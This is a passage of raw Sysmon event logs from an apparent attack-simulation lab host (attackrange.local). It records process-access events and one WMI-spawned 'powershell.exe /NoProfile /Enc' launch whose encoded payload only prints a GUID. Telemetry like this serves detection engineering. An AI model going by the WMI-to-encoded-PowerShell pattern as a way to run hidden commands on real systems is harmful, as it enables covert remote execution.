16:53:44.275{05ADC7E1-6D98-603E-95AA-00000000AD01}6528ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_td4gpbh0.rxm.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.273{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-98AA-00000000AD01}10664C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000002238442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.268{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6CE81009C0534FC85A2069C0B30D471,SHA256=DD25E2205A438FA64E4EA93768C438CC8ECE72EEA03770219E3B2D094F2411CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.268{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-97AA-00000000AD01}13564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.265{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.265{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.265{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.265{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.264{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-97AA-00000000AD01}13564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.263{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-97AA-00000000AD01}13564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002238434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.264{05ADC7E1-6D98-603E-97AA-00000000AD01}13564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /Enc VwByAGkAdABlAC0ASABvAHMAdAAgAGIAOQBhADUANAA0ADkANQAtAGIAYgA2AGEALQA0ADMANAA5AC0AYQA1AGMAZAAtADAANgBlADIAZAAwADIAYwBkADEAYQA5AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002238433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.248{05ADC7E1-6D98-603E-95AA-00000000AD01}6528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_td4gpbh0.rxm.ps12021-03-02 16:53:44.248 10341000x80000000000000002238432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.248{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-93AA-00000000AD01}13748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.248{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-93AA-00000000AD01}13748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.232{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-95AA-00000000AD01}6528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-96AA-00000000AD01}6924C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-95AA-00000000AD01}6528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-94AA-00000000AD01}15412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-93AA-00000000AD01}13748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D97-603E-92AA-00000000AD01}11928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D97-603E-91AA-00000000AD01}16200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.232{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75BA66AE655B114EC68C871843D53C3C,SHA256=A8786F9E8FABC18C06B30AC45559A696D710B7D3ACAFFCDD74E2AA11FAC26511,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+8143